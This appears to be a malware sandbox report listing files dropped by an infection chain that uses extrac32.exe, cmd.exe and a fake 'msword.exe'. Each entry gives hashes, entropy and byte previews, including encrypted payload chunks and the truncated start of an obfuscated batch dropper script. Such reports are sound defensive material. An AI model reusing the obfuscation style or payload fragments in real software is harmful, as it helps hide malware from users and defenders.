Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indonesia

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.557400918137722
Encrypted:	false
SSDEEP:	1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
MD5:	15BE985957A02EE4B7D96A3C52FF0016
SHA1:	B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
SHA-256:	E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
SHA-512:	9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
Malicious:	false
Preview:	.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......\|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>\|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Instantly

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.7085176792029815
Encrypted:	false
SSDEEP:	1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
MD5:	7FC8AB46CD562FFA0E11F3A308E63FA7
SHA1:	DD205EA501D6E04EF3217E2D6488DDB6D25F4738
SHA-256:	5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
SHA-512:	25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
Malicious:	false
Preview:	.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..\|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Led

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.70232349488191
Encrypted:	false
SSDEEP:	3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
MD5:	C038EEFE422386831ACF8D9D6898D464
SHA1:	9CF7F3E9A50218D5E03617B793EAE447645E6A90
SHA-256:	1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
SHA-512:	8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
Malicious:	false
Preview:	J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~\|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~\|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~\|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F\|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F\|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leisure

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997097243867807
Encrypted:	true
SSDEEP:	1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
MD5:	838511D6727BE6237C1E4CD26A0885DE
SHA1:	7A9FFA35532A5817F04CB48C9E154B5C9DE74623
SHA-256:	D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
SHA-512:	AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
Malicious:	false
Preview:	.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL..s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.\|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.........Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....\|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e...>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Math

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997538946660952
Encrypted:	true
SSDEEP:	1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
MD5:	7B5C9E82025D184E64A7413174CE1A1C
SHA1:	C552965CE73D43225541932D65C3B4B6342A70E4
SHA-256:	7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
SHA-512:	71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
Malicious:	false
Preview:	/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..\|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>....a.d..}.N.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Measurement

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1237
Entropy (8bit):	3.752009061763574
Encrypted:	false
SSDEEP:	12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
MD5:	47FE88841F7CEA67286B6BB812A7A09F
SHA1:	950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
SHA-256:	33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
SHA-512:	C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
Malicious:	false
Preview:	Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Missed

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	5.9158452815608795
Encrypted:	false
SSDEEP:	1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
MD5:	E6FE42ADC3082D12E845756426492B6E
SHA1:	E1170EE049AB607162D1495B625AA74221AA8585
SHA-256:	BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
SHA-512:	9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
Malicious:	false
Preview:	...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0\|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Next

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.9979666143694095
Encrypted:	true
SSDEEP:	1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
MD5:	52C875EB8A3EBC4643094465CDBB08D0
SHA1:	013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
SHA-256:	A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
SHA-512:	97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Protocol

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	43912
Entropy (8bit):	7.0754478586730984
Encrypted:	false
SSDEEP:	768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	28E6332970BFF06A0431BFEFBCD59462
SHA1:	20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
SHA-256:	85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
SHA-512:	CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
Malicious:	false
Preview:	..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Realm

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	42495
Entropy (8bit):	7.994847286020057
Encrypted:	true
SSDEEP:	768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
MD5:	062E20D07FE052044D9339A8B3F1CB38
SHA1:	5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
SHA-256:	84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
SHA-512:	2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
Malicious:	false
Preview:	.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...\|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr\|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU\|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..A=".\|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0.......T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Substantial

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.996685518527556
Encrypted:	true
SSDEEP:	1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
MD5:	734A793F9424DE731EEE480B610E0257
SHA1:	DD2073F71258FC036517ED503B3F85FD8ECDFDA6
SHA-256:	0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
SHA-512:	194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
Malicious:	false
Preview:	\|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..\|.U.........L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G.....B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.\|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H\|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Undefined

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.996945320826708
Encrypted:	true
SSDEEP:	1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
MD5:	10CF860D6ED7F8B77D7F02A407DDDE2C
SHA1:	42C54FF8B32BD09B583E544837A65248AF7B60AB
SHA-256:	A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
SHA-512:	355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
Malicious:	false
Preview:	>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.\|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8...#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f\|.Y@X..,.u.C.o~....L.E....2.K..}..;....e....w...U...L...7#.\|..`5g.x<....../.]^.j.,y.#W.....B\.y

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1692
Entropy (8bit):	5.438068876258441
Encrypted:	false
SSDEEP:	48:mWSU4Yymp+ms4RIoU99tK8NWR81N1XR9001dq/:mLHYvVsIfA2KWYS01Y/
MD5:	32E39CDA9BD5B077E2D4F88B9C50905C
SHA1:	5166D904A3B3B4B66A47B2B4A4BC82C8708AC3D7
SHA-256:	D5881E86F282AD76F85B65A30426903AECF8429787320049F681464241C90802
SHA-512:	96854C4ADE2B659A8BEF22622F67611C8E0FF066BF7F51384A4F09C3500E7D6B052CE331F6892A4F94A493BFB60242A4C8339F0DB9B0068D4A354DB90F9C841D
Malicious:	false
Preview:	@...e...........?...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\MSI28243.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5162684137903053
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClErNaYlYH:Qw946cPbiOxDlbYnuRKTWDrNaYlYH
MD5:	033FAA03FFEC26751755EA1583E6CC67
